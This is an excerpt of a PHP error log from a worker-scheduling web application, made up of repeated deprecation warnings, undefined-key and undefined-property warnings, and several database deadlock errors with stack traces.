UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:19:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:20:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:21:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:22:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:23:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 23:14:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Jan-2025 23:14:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 03:06:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 05:02:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 10:55:10 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [05-Jan-2025 12:47:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 12:48:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 12:50:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 12:51:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 12:51:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:08:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 13:11:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:11:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:14:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:15:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:16:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 13:25:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:26:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 13:36:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 13:44:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 14:14:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:02:36 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/emeraadmin/public_html/pages/taskform.php on line 198 [06-Jan-2025 03:02:36 Australia/Sydney] PHP Warning: Undefined array key "email" in /home/emeraadmin/public_html/pages/taskform.php on line 201 [05-Jan-2025 22:42:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 22:44:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 22:45:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:45:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:46:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:47:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:47:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 22:47:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [05-Jan-2025 23:33:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:39:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:47:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:50:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [05-Jan-2025 23:56:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 00:12:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 00:53:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:53:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:53:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:54:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 00:57:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:27:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:44:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:45:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 01:48:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:19:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 02:21:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:21:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:22:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:22:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [06-Jan-2025 02:38:04 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [06-Jan-2025 02:42:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 02:53:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 02:56:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:30:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:47:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 03:53:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 04:00:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 04:50:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [06-Jan-2025 04:55:37 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [06-Jan-2025 04:56:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 05:25:39 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [06-Jan-2025 05:25:59 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [06-Jan-2025 05:26:03 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [06-Jan-2025 05:27:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 05:39:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 05:43:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 06:14:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 06:29:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:30:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:32:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:33:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:35:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:37:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:47:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:47:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:47:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:48:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:48:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:51:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:52:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:52:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:52:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:54:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 06:58:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 07:19:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 07:21:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 11:36:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 11:43:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 11:43:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 11:43:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 20:46:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 22:24:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:03:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:04:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:17:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:26:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [06-Jan-2025 23:27:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [06-Jan-2025 23:30:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 00:20:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 00:21:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 00:21:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 01:02:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 02:11:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 02:11:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 02:12:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 02:16:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:33:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:36:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:39:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:43:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 03:49:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:10:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:10:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:11:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:34:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:48:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 04:49:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:52:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:54:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:54:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 04:55:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 05:02:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 05:02:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 05:05:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 05:09:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 05:44:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 